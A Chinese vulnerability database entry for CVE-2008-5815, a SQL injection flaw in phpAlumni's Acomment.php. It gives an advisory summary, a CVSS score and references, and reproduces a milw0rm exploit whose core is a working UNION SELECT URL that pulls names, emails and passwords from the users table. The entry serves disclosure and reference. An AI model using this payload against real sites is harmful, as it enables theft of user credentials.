phpAlumni 'Acomment.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117153 漏洞类型 SQL注入
发布时间 2008-12-29 更新时间 2009-01-29
CVE编号 CVE-2008-5815 CNNVD-ID CNNVD-200901-010
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7621
https://cxsecurity.com/issue/WLB-2009010009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-010
|漏洞详情
PHP是服务器端脚本语言,特别适合于Web开发,可嵌入到HTML中,可以运行于Windows、Linux和许多Unix操作系统。phpAlumni中的Acomment.php存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL InjEcti0n Vulnerability
##
## PHPAlumni ( Acomment.php id )
##                            
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM
##
## Email  : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
##
## -[[: Exploite :]]-
##
##   www.Target.com/Acomment.php?id=1+union+select+0,0,0,0,0,0,0,0,concat_ws(0x3a,name,email,password),0,0+from+users--
##
########################
########################

#######################################################################################################
#######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                         
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-12-29]
|参考资料

来源:BID
名称:33055
链接:http://www.securityfocus.com/bid/33055
来源:MILW0RM
名称:7621
链接:http://www.milw0rm.com/exploits/7621
来源:SREASON
名称:4859
链接:http://securityreason.com/securityalert/4859